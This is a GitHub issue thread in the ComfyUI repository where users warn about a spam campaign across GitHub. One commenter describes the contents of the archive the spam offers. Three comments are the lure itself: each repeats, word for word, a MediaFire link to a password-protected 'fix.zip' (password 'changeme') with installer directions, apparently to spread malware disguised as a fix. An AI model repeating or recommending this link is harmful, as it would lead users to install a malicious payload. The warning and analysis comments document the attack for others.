### ISSUE TITLE
WARNING!!!! Forum is being attacked by hackers!!!

### ISSUE THREAD

**Issue by MGTRIDER** [comfyanonymous/ComfyUI#4616]
### Your question

This is not a question but a warning. The forums are being attacked by hackers just like what happened recently to SD WebUI FORGE git page.  
![Hacker Attacks_copy](https://github.com/user-attachments/assets/88afd3b7-becb-48ab-8c32-c4b4ddf961a6)

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mcmonkey4eva** [comment]
They're targeting all of github atm, not limited to just AI or anything. Hopefully github staff are able to block it soon

**Comment by MGTRIDER** [comment]
> They're targeting all of github atm, not limited to just AI or anything. Hopefully github staff are able to block it soon

I see, thanks for the info. It's indeed annoying as it spreads so fast.

**Comment by timmalich** [comment]
Facing the same on my bug report. https://github.com/OpenLiberty/open-liberty/issues/29486 

Since this is currently on top of google, if you search for ports of the original post and for those who are curious: 
I downloaded and encrypted the file with the given password on spare PC. 
It contains a x86_64-w64-ranlib.exe and a msvcp140.dll
![image](https://github.com/user-attachments/assets/1fbfc8c8-0c14-4c73-96a6-e285a09e23c6)

![image](https://github.com/user-attachments/assets/838b547d-284f-4a10-9926-55559ed5275d)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
